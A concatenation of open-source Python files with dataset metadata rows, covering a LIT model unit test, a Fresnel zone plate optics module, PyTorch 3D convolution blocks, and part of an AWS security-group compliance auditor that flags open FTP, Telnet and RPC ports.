] | 156 | 2020-08-16T21:09:05.000Z | 2022-03-30T18:04:53.000Z | lit_nlp/examples/models/glue_models_test.py | soma2000-lang/lit | b46c0cac34baa571242637b53b78cfd69de536d0 | [
"Apache-2.0"
] | 301 | 2020-08-14T05:52:56.000Z | 2022-03-25T22:48:01.000Z | """Tests for lit_nlp.examples.models.glue_models."""
from absl.testing import absltest
from lit_nlp.examples.models import glue_models
import numpy as np
class GlueModelForTesting(glue_models.GlueModel):
"""Glue model for testing, which skips Huggingface initializations."""
def _load_model(self, model_name_or_path):
pass
class GlueModelsTest(absltest.TestCase):
def test_scatter_all_embeddings_single_input(self):
glue_model = GlueModelForTesting(
model_name_or_path="bert-base-uncased",
text_a_name="sentence1")
emb_size = 10
# We'll inject zeros for the embeddings of 'hi',
# while special tokens get vectors of 1s.
embs_a = np.zeros((1, emb_size))
input_embs = np.ones((1, 3, emb_size))
# Scatter embs_a into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
}], input_embs)
target = [[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
def test_scatter_all_embeddings_both_inputs(self):
glue_model = GlueModelForTesting(
model_name_or_path="bert-base-uncased",
text_a_name="sentence1",
text_b_name="sentence2")
emb_size = 10
# Inject zeros at positions corresponding to real tokens
# in each segment. Special tokens get vectors of 1s.
embs_a = np.zeros((1, emb_size))
embs_b = np.zeros((3, emb_size))
input_embs = np.ones((1, 7, emb_size))
# Scatter embs_a and embs_b into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
"sentence2": "how are you",
"input_embs_sentence2": embs_b
}], input_embs)
target = [[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
def test_scatter_all_embeddings_multi_batch(self):
glue_model = GlueModelForTesting(
model_name_or_path="bert-base-uncased",
text_a_name="sentence1")
emb_size = 4
embs_a = np.zeros((1, emb_size))
embs_b = np.zeros((2, emb_size))
input_embs = np.ones((2, 4, emb_size))
# Scatter embs_a and embs_b into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
},
{"sentence1": "hi there",
"input_embs_sentence1": embs_b,
}], input_embs)
target = [[[1, 1, 1, 1],
[0, 0, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
# Scatter only embs_a into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
},
{"sentence1": "hi there"
}], input_embs)
target = [[[1, 1, 1, 1],
[0, 0, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
# Scatter only embs_b into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi"},
{"sentence1": "hi there",
"input_embs_sentence1": embs_b,
}], input_embs)
target = [[[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
if __name__ == "__main__":
absltest.main()
| 40.041322 | 80 | 0.461507 | 599 | 4,845 | 3.507513 | 0.160267 | 0.104712 | 0.139933 | 0.163732 | 0.754879 | 0.735364 | 0.724893 | 0.70633 | 0.70633 | 0.70633 | 0 | 0.082048 | 0.411352 | 4,845 | 120 | 81 | 40.375 | 0.654628 | 0.101548 | 0 | 0.715789 | 0 | 0 | 0.083295 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.042105 | false | 0.010526 | 0.031579 | 0 | 0.094737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3706d9a147c7efb0f1f4adf8064c640a42be33e0 | 1,539 | py | Python | diffractsim/diffractive_elements/fresnel_zone_plate.py | rafael-fuente/diffractsim | 7287635d2bfa76f8b1eb24c6208796f761dd6144 | [
"BSD-3-Clause"
] | 29 | 2022-01-01T01:16:29.000Z | 2022-03-31T00:42:52.000Z | diffractsim/diffractive_elements/fresnel_zone_plate.py | rafael-fuente/diffractsim | 7287635d2bfa76f8b1eb24c6208796f761dd6144 | [
"BSD-3-Clause"
] | 2 | 2022-01-02T17:33:00.000Z | 2022-01-03T17:51:39.000Z | diffractsim/diffractive_elements/fresnel_zone_plate.py | rafael-fuente/diffractsim | 7287635d2bfa76f8b1eb24c6208796f761dd6144 | [
"BSD-3-Clause"
] | 6 | 2022-02-07T22:44:42.000Z | 2022-03-23T12:34:54.000Z | import numpy as np
from ..util.backend_functions import backend as bd
from .diffractive_element import DOE
class BinaryFZP(DOE):
def __init__(self, f, λ, radius = None, aberration = None):
"""
Creates a Phase Binary Fresnel Zone Plate with a focal length equal to f for a wavelength λ
"""
global bd
from ..util.backend_functions import backend as bd
self.f = f
self.FZP_λ = λ
self.radius = radius
def get_transmittance(self, xx, yy, λ):
t = 1
if self.radius != None:
t = bd.where((xx**2 + yy**2) < self.radius**2, t, bd.zeros_like(xx))
r_2 = xx**2 + yy**2
phase_shift = bd.pi* (bd.sign(((2*bd.pi/self.FZP_λ * (bd.sqrt(f**2 + r_2) - f))) % (2*bd.pi) - bd.pi ))/2.
t = t*bd.exp(1j*phase_shift)
return t
class FZP(DOE):
def __init__(self, f, λ, radius = None, aberration = None):
"""
Creates a Phase Blazed (Ideal) Fresnel Zone Plate with a focal length equal to f for a wavelength λ
"""
global bd
from ..util.backend_functions import backend as bd
self.f = f
self.FZP_λ = λ
self.radius = radius
def get_transmittance(self, xx, yy, λ):
t = 1
if self.radius != None:
t = bd.where((xx**2 + yy**2) < self.radius**2, t, bd.zeros_like(xx))
r_2 = xx**2 + yy**2
phase_shift = -(2*bd.pi/λ * (bd.sqrt(self.f**2 + r_2) - self.f))
t = t*bd.exp(1j*phase_shift)
return t
| 27.482143 | 118 | 0.556205 | 244 | 1,539 | 3.397541 | 0.241803 | 0.036188 | 0.024125 | 0.028951 | 0.814234 | 0.814234 | 0.814234 | 0.814234 | 0.764777 | 0.702051 | 0 | 0.022727 | 0.31384 | 1,539 | 55 | 119 | 27.981818 | 0.762311 | 0.124107 | 0 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.151515 | 0 | 0.393939 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2eba4bdc69f90d559c48e1af4ef9affe05f3e336 | 45 | py | Python | src/models/__init__.py | andriihomiak/literate-enigma | 179a52432a0c9b67e916c5c9157e8f3051a20619 | [
"MIT"
] | null | null | null | src/models/__init__.py | andriihomiak/literate-enigma | 179a52432a0c9b67e916c5c9157e8f3051a20619 | [
"MIT"
] | null | null | null | src/models/__init__.py | andriihomiak/literate-enigma | 179a52432a0c9b67e916c5c9157e8f3051a20619 | [
"MIT"
] | null | null | null | from .classification import ClassificationNet | 45 | 45 | 0.911111 | 4 | 45 | 10.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 45 | 1 | 45 | 45 | 0.97619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2edd530ef6e56e4b94e5d9e4b2c7ca1933139845 | 1,329 | py | Python | lowres/model/lowres/structural_blocks.py | mdpi2020lowres/mdpi2020lowres | 1a73ab011063998e57a31db13b170d604f71a794 | [
"Apache-2.0"
] | null | null | null | lowres/model/lowres/structural_blocks.py | mdpi2020lowres/mdpi2020lowres | 1a73ab011063998e57a31db13b170d604f71a794 | [
"Apache-2.0"
] | null | null | null | lowres/model/lowres/structural_blocks.py | mdpi2020lowres/mdpi2020lowres | 1a73ab011063998e57a31db13b170d604f71a794 | [
"Apache-2.0"
] | null | null | null | import torch.nn as nn
class PreActivation3dNoBN(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, bias=True):
super().__init__()
self.conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
return self.conv(self.activation(x))
class PostActivation3dNoBN(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, bias=True):
super().__init__()
self.conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
return self.activation(self.conv(x))
class ResBlock3dNoBN(nn.Module):
def __init__(self, n_channels, kernel_size=3, padding=1, bias=True):
super().__init__()
self.path = nn.Sequential(
nn.Conv3d(n_channels, n_channels, kernel_size=kernel_size, padding=padding, bias=bias),
nn.ReLU(inplace=True),
nn.Conv3d(n_channels, n_channels, kernel_size=kernel_size, padding=padding, bias=bias),
nn.ReLU(inplace=True),
)
def forward(self, x):
x_path = self.path(x)
return x + x_path
| 33.225 | 109 | 0.669676 | 180 | 1,329 | 4.666667 | 0.188889 | 0.130952 | 0.15 | 0.1 | 0.802381 | 0.779762 | 0.779762 | 0.779762 | 0.761905 | 0.761905 | 0 | 0.012357 | 0.208427 | 1,329 | 39 | 110 | 34.076923 | 0.786122 | 0 | 0 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.037037 | 0.074074 | 0.481481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
25a18a2801476bffae7d8c653c93a397575b7605 | 226,652 | py | Python | eeauditor/auditors/aws/Amazon_EC2_Security_Group_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/Amazon_EC2_Security_Group_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/Amazon_EC2_Security_Group_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
ec2 = boto3.client("ec2")
# loop through security groups
def describe_security_groups(cache):
response = cache.get("describe_security_groups")
if response:
return response
cache["describe_security_groups"] = ec2.describe_security_groups()
return cache["describe_security_groups"]
@registry.register_check("ec2")
def security_group_all_open_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.1] Security groups should not allow unrestricted access to all ports and protocols"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if ipProtocol == "-1" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-all-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[SecurityGroup.1] Security groups should not allow unrestricted access to all ports and protocols",
"Description": "Security group "
+ sgName
+ " allows unrestricted access to all ports and protocols. Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif ipProtocol == "-1" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-all-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.1] Security groups should not allow unrestricted access to all ports and protocols",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted access to all ports and protocols. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_ftp_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.2] Security groups should not allow unrestricted File Transfer Protocol (FTP) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort == "20" and fromPort == "21" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-ftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.2] Security groups should not allow unrestricted File Transfer Protocol (FTP) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted File Transfer Protocol (FTP) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort == "20" and fromPort == "21" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-ftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.2] Security groups should not allow unrestricted File Transfer Protocol (FTP) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted File Transfer Protocol (FTP) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_telnet_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.3] Security groups should not allow unrestricted TelNet access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "23" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-telnet-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.3] Security groups should not allow unrestricted TelNet access",
"Description": "Security group "
+ sgName
+ " allows unrestricted TelNet access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "23" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-telnet-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.3] Security groups should not allow unrestricted TelNet access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted TelNet access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_dcom_rpc_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.4] Security groups should not allow unrestricted Windows RPC DCOM access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "135" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rpc-dcom-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.4] Security groups should not allow unrestricted Windows RPC DCOM access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Windows RPC DCOM access on "
+ ipProtocol
